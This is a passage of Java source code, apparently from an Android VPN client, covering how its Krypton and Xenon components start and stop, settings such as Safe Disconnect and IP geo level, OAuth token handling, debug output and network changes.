extendDuration.toMillis() + " ms", e); throw e; } return null; }, backgroundExecutor); } /** * Stops Krypton and tells the VpnService to stop. * * @param status The status that PPN should report to the listener when it is finished stopping. 
*/ @VisibleForTesting void stopKryptonAndService(PpnStatus status) { Log.w(TAG, "Stopping PPN: " + status); try { // We have to stop Krypton before trying to stop the Service, because as long as the VPN is // established, the Service will be bound by Android as a foreground Service, and stopSelf // will be ignored. // // However, anything other than Krypton that needs to be stopped can be handled by the // Service's onDestroy method calling onStopService(). // Log.w(TAG, "Ready to stop Krypton."); stopKrypton(); } catch (PpnException e) { Log.e(TAG, "Unable to stop krypton.", e); } finally { Log.w(TAG, "PPN stopping VpnService."); kryptonStoppedStatus = status; vpnManager.stopService(); } } @Override public ListenableFuture<Void> setSafeDisconnectEnabled(boolean enable) { // Store the value for the next time PPN is started. this.options.setSafeDisconnectEnabled(enable); // If PPN is already running, tell Krypton to update the value. return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { // Call a setter that injects feature state into Krypton. krypton.setSafeDisconnectEnabled(enable); } // If Krypton isn't running, feature state will be passed on Krypton startup through // config. } } catch (KryptonException e) { Log.e(TAG, "Unable to set Safe Disconnect in Krypton.", e); } }, backgroundExecutor); } @Override public ListenableFuture<Void> setIpGeoLevel(IpGeoLevel level) { // Store the value for the next time PPN is started. this.options.setIpGeoLevel(level); // If PPN is already running, tell Krypton to update the value. return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { // Call a setter that injects feature state into Krypton. krypton.setIpGeoLevel(level); } // If Krypton isn't running, feature state will be passed on Krypton startup through // config. 
} } catch (KryptonException e) { Log.e(TAG, "Unable to set IP Geo Level in Krypton.", e); } }, backgroundExecutor); } @Override public void setDisallowedApplications(Iterable<String> disallowedApplications) { HashSet<String> copy = new HashSet<>(); for (String packageName : disallowedApplications) { copy.add(packageName); } this.disallowedApplications = Collections.unmodifiableSet(copy); } @Override public void setBypassOptions(BypassOptions bypassOptions) { // Store the value for the next time PPN is started. setDisallowedApplications(bypassOptions.disallowedApplications()); vpnManager.setBypassOptions(bypassOptions); // If PPN is already running, tell Krypton to update the tunnel. try { synchronized (kryptonLock) { if (krypton != null) { // Update the tunnel to pick up the new settings krypton.forceTunnelUpdate(); } } } catch (KryptonException e) { Log.e(TAG, "Unable to force tunnel update in Krypton.", e); } } /** Returns the current Safe Disconnect state. */ @Override public boolean isSafeDisconnectEnabled() { return options.isSafeDisconnectEnabled(); } @VisibleForTesting Optional<IpGeoLevel> getIpGeoLevel() { return options.getIpGeoLevel(); } @Override public boolean isRunning() { return vpnManager.isRunning(); } /** Puts Krypton in a horrible wedged state, for testing app bypass, etc. 
*/ @Override public ListenableFuture<Void> setSimulatedNetworkFailure(boolean simulatedNetworkFailure) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Setting simulated network failure to " + simulatedNetworkFailure); krypton.setSimulatedNetworkFailure(simulatedNetworkFailure); } else { Log.i( TAG, "Not setting simulated network failure to " + simulatedNetworkFailure + ", because Krypton isn't running."); } } } catch (KryptonException e) { Log.e(TAG, "Failed to set simulated network failure.", e); throw new PpnException("Failed to set simulated network failure", e); } return null; }, backgroundExecutor); } @Override public JSONObject getDebugJson() { PpnDebugJson.Builder builder = new PpnDebugJson.Builder(); builder.setServiceDebugJson(new PpnServiceDebugJson.Builder().setRunning(isRunning()).build()); synchronized (kryptonLock) { if (krypton != null) { try { builder.setKryptonDebugJson(krypton.getDebugJson()); } catch (KryptonException e) { Log.e(TAG, "Unable to get krypton debug json.", e); } } } builder.setXenonDebugJson(xenon.getDebugJson()); return builder.build(); } @Override public void setPpnListener(PpnListener listener) { this.listener = listener; } @VisibleForTesting void setTelemetryManager(PpnTelemetryManager telemetryManager) { telemetry = telemetryManager; } @Override public PpnTelemetry collectTelemetry() { logDebugInfoAsync(Duration.ofSeconds(30)); synchronized (kryptonLock) { return telemetry.collect(krypton); } } @Override public void setNotification(int notificationId, Notification notification) { notificationManager.setNotification(context, notificationId, notification); } private void startVpn() { Intent intent = new Intent(VpnService.SERVICE_INTERFACE); intent.setPackage(context.getApplicationContext().getPackageName()); context.startForegroundService(intent); } @Override public void onServiceStarted(VpnService vpnService) { onStartService(vpnService); } @Override public void 
onServiceStopped() { onStopService(); } /** * Handles any PPN logic that needs to occur when the Service is started, such as permanent * notification management. * * @return a Task that will be resolved once all of the async startup work is complete. */ @CanIgnoreReturnValue public Task<Void> onStartService(VpnService service) { Log.w(TAG, "PPN Service is starting."); kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; vpnManager.setService(service); notificationManager.startService(service); // Look up the user account and notify the app that the PPN service has started. return accountCache .getPpnAccountAsync() .continueWithTask( backgroundExecutor, accountTask -> { Log.w(TAG, "PPN ready to start Krypton."); startKrypton(); return accountTask; }) .continueWith( TaskExecutors.MAIN_THREAD, accountTask -> { telemetry.notifyStarted(); Log.w(TAG, "PPN sending started event."); // Notify the app that PPN is started for this user. Account account = accountTask.getResult(); boolean needsNotification = !notificationManager.hasNotification(); if (listener != null) { listener.onPpnStarted(account, needsNotification); } return null; }) .continueWith( TaskExecutors.MAIN_THREAD, task -> { if (!task.isSuccessful()) { // Log the exception here, since non-test callers aren't expected to use the Task. Log.e(TAG, "Error starting PPN.", task.getException()); } return null; }); } /** * Fetches a new oauth token for Zinc, using the user who started PPN. This method should not be * called from the UI thread. * * @throws PpnException if no user is available, or the request fails for any reason. */ public String getZincOAuthToken() throws PpnException { ensureBackgroundThread(); Network network = vpnManager.getNetwork(); Account account = accountCache.getPpnAccount(); return accountManager.getOAuthToken(context, account, options.getZincOAuthScopes(), network); } /** Removes the given oauth token from the cache. 
*/ private void clearZincOAuthToken(String token) { ensureBackgroundThread(); Log.w(TAG, "Clearing oauth token"); accountManager.clearOAuthToken(context, token); } /** * Returns whether the underlying VpnService should set the STICKY bit to be restarted by Android. */ public boolean isStickyService() { return options.isStickyService(); } /** Changes the factory used to create Krypton instances. For testing only. */ @VisibleForTesting void setKryptonFactory(KryptonFactory factory) { this.kryptonFactory = factory; } /** Returns VpnManager for testing only. */ @VisibleForTesting VpnManager getVpnManager() { return vpnManager; } /** Returns the Xenon instance being used. For testing only. */ @VisibleForTesting Xenon getXenon() { return xenon; } /** Changes the Xenon instance used. For testing only. */ @VisibleForTesting void setXenon(Xenon xenon) { this.xenon = xenon; } /** Creates a KryptonConfig with the options and feature state of this PPN instance. */ private KryptonConfig createKryptonConfig() { return this.options.createKryptonConfigBuilder().build(); } /** * Starts Krypton running. This will cause Krypton to authenticate and connect to its data plane. */ private void startKrypton() throws PpnException { ensureBackgroundThread(); vpnMonitor.start(); synchronized (kryptonLock) { if (krypton != null) { throw new PpnException("Tried to start Krypton when it was already running."); } Log.w(TAG, "PPN creating Krypton."); krypton = kryptonFactory.createKrypton(this, backgroundExecutor); try { Log.w(TAG, "PPN starting Krypton."); krypton.start(createKryptonConfig()); } catch (KryptonException e) { krypton = null; throw new PpnException("Unable to start Krypton.", e); } } Log.w(TAG, "PPN starting Xenon."); xenon.start(); Log.w(TAG, "PPN finished starting Xenon."); } /** * Stops Xenon and Krypton, if it is running. * * @throws PpnException if Krypton.stop() threw. 
*/ private void stopKrypton() throws PpnException { Log.w(TAG, "PPN stopping Xenon."); xenon.stop(); Log.w(TAG, "PPN stopped Xenon."); vpnMonitor.stop(); synchronized (kryptonLock) { if (krypton == null) { return; } try { Log.w(TAG, "PPN stopping Krypton."); krypton.stop(); Log.w(TAG, "Krypton stop returned."); } catch (KryptonException e) { throw new PpnException("Unable to stop Krypton.", e); } finally { krypton = null; } } } /** * Logs PPN debug info to logcat in the background. * * @return the JSONObject that was logged. */ @ResultIgnorabilityUnspecified @VisibleForTesting Task<JSONObject> logDebugInfoAsync(Duration timeout) { // A task that will be resolved either when the debug info has been printed, or after timeout. TaskCompletionSource<JSONObject> tcs = new TaskCompletionSource<>(); AtomicBoolean finished = new AtomicBoolean(false); // Set up a timeout to log if getDebugJson doesn't appear to be responding. Runnable timeoutRunner = () -> { if (finished.compareAndSet(false, true)) { Log.i(TAG, "PPN appears to be deadlocked while fetching debug info."); tcs.trySetException(new TimeoutException("Call to getDebugJson timed out.")); } }; mainHandler.postDelayed(timeoutRunner, timeout.toMillis()); // Get the debug info from the background thread. backgroundExecutor.execute( () -> { JSONObject debug = getDebugJson(); if (finished.compareAndSet(false, true)) { mainHandler.removeCallbacks(timeoutRunner); Log.i(TAG, "PPN debug info: " + debug); tcs.setResult(debug); } }); return tcs.getTask(); } public void onStopService() { Log.w(TAG, "PPN Service has stopped."); // Grab the status reported from Krypton when it stopped, before resetting everything. PpnStatus status = kryptonStoppedStatus; kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; vpnManager.setService(null); notificationManager.stopService(); // Krypton should already be stopped, but if it's not, try to stop it. 
try { stopKrypton(); } catch (PpnException e) { Log.e(TAG, "Unable to stop Krypton.", e); } // Report to the listener why PPN was stopped. telemetry.notifyStopped(); if (listener != null) { listener.onPpnStopped(status); } } private NetworkInfo createNetworkInfo(PpnNetwork ppnNetwork) { NetworkInfo.Builder builder = NetworkInfo.newBuilder() .setNetworkType(ppnNetwork.getNetworkType()) .setNetworkId(ppnNetwork.getNetworkId()) .setAddressFamily(ppnNetwork.getAddressFamily()); if (options.isDynamicMtuEnabled()) { if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { ConnectivityManager manager = context.getSystemService(ConnectivityManager.class); LinkProperties linkProperties = manager.getLinkProperties(ppnNetwork.getNetwork()); int mtu = linkProperties.getMtu(); if (mtu != 0) { builder.setMtu(mtu); } } } return builder.build(); } @Override public void onNetworkAvailable(PpnNetwork ppnNetwork) { Log.w(TAG, "PPN received network available."); telemetry.notifyNetworkAvailable(); backgroundExecutor.execute( () -> { try { synchronized (kryptonLock) { if (krypton != null) { NetworkInfo networkInfo = createNetworkInfo(ppnNetwork); Log.w(TAG, "Setting network on Krypton."); try { krypton.setNetwork(networkInfo); } finally { vpnManager.setNetwork(ppnNetwork); } } } } catch (KryptonException e) { Log.e(TAG, "Unable to switch networks.", e); } }); } @Override public void onNetworkUnavailable(NetworkUnavailableReason reason) { Log.w(TAG, "PPN received network unavailable."); telemetry.notifyNetworkUnavailable(); backgroundExecutor.execute( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.w(TAG, "Setting Krypton network unavailable."); krypton.setNoNetworkAvailable(); } } } catch (KryptonException e) { Log.e(TAG, "Unable to set no network.", e); } }); } private static void ensureBackgroundThread() { if (Looper.getMainLooper().isCurrentThread()) { throw new IllegalStateException("Must not be called on the main thread."); } } }